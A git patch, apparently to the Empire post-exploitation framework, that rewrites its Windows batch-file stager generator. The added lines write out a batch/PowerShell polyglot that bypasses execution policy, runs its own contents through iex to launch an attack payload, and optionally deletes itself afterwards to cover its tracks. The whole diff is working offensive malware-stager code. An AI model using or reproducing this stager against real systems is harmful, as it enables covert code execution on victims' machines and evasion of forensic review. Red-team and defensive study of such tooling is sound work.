From f3a6d70a7f48210e21157510446cc5742cb90665 Mon Sep 17 00:00:00 2001
From: Anthony Rose <anthonyrose88@gmail.com>
Date: Fri, 6 Nov 2020 19:56:36 -0800
Subject: [PATCH] Removed bat file length limit (#385)

* updated batch file stager to remove command length restriction

* fixed self destruct setting

Co-authored-by: hubbl3 <jake.krasnov@bc-security.org>
---
 lib/stagers/windows/launcher_bat.py | 11 ++++++++---
 1 file changed, 8 insertions(+), 3 deletions(-)

diff --git a/lib/stagers/windows/launcher_bat.py b/lib/stagers/windows/launcher_bat.py
index d70f5e24b..7ff91211c 100644
--- a/lib/stagers/windows/launcher_bat.py
+++ b/lib/stagers/windows/launcher_bat.py
@@ -134,11 +134,16 @@ def generate(self):
             print(helpers.color("[!] Error in launcher command generation."))
             return ""
         else:
-            code = "@echo off\n"
-            code += "start /b " + launcher + "\n"
+            # The start to the batch eliminates the batch file command limit. It was taken from here:
+            # https://www.reddit.com/r/PowerShell/comments/gaa2ip/never_write_a_batch_wrapper_again/
 
             if delete.lower() == "true":
                 # code that causes the .bat to delete itself
-                code += "start /b \"\" cmd /c del \"%%~f0\"&exit /b\n"
+                code = '# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText(\'%~f0\')|iex" & DEL \"%~f0\" & POPD /B\n'
+            else:
+                code = '# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText(\'%~f0\')|iex" & POPD /B\n'
+            code += launcher + "\n"
+
+
 
             return code